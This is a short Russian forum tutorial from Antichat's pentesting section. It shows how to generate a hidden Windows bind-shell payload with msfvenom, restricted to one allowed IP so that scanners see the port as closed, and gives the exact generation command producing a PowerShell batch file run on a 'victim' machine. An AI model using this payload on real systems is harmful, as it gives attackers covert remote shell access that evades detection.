HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Этичный хакинг или пентестинг
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 16.12.2016, 02:35
<~DarkNode~>
Новичок
Регистрация: 20.10.2016
Сообщений: 0
С нами: 5033900

Репутация: 0
По умолчанию




Привет колеги. Это будет коротенький пост из серии MustKnow(Нужно Знать). Как бы ничего нового но я посчитал нужным кинуть в копилку форума описания этого метода.
Ничего нового мы изобретать с вами не будем,а воспользуемся обычной генерацией полезной нагрузки средствами msfvenom,и я лишь немного прокомментирую этот способ полученияBIND SHELL-а.

И так, давайте для начала посмотрим все опции которые возможны при создании нашего скрытого бинд шелла,а так же глянем описания(Рекомендую всегда читать описания!):

Код:


Код:
msfvenom -p windows/shell_hidden_bind_tcp --payload-options


Как видим из списка опций - есть обязательный параметр AHOST ([Allowed IP Adress|Разрешенный айпишник]) И в описании читаем о том ,что мы поднимаем листенер на порту ,которой указывается опционально "параметр LPORT", и если мы будем стучатся на этот порт с айпишника который мы указали в параметре AHOST - то нам будет прилетать шелл,но если это будет любой другой айпи адресс - то удаленная машина будет отвечать RST пакетом и порт для соединения будет закрыт.Таким образом обнаружить открытый порт никто кроме нас не сможет(ну если конечно с нашего айпишника никто не будет сканит)

Давайте все же протестируем. Создадим полезную нагрузку:

Код:


Код:
msfvenom -p windows/shell_hidden_bind_tcp AHOST=192.168.137.137 lport=4444 -f psh-cmd -o hack.bat
AHOST -- разрешенный айпи (в моем случае 192.168.137.137)
lport-- порт для листенера
-f psh-cmd -- формат полезной нагрузки ( в моем случает однострочная команда для powershell)




Я специально для наглядности указал не свой айпи что бы показать как это работает.
Дальше запустим на стороне жертвы и попробуем просканировать на 4444 порт.











Как видите порт закрыт. Давайте сменим свой айпи на 192.168.137.137 и попробуем снова.





Проверим шелл:





Все работает с указанного айпи)
Надеюсь кому то будет полезным)
Всем спасибо)
 
Ответить с цитированием
 





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.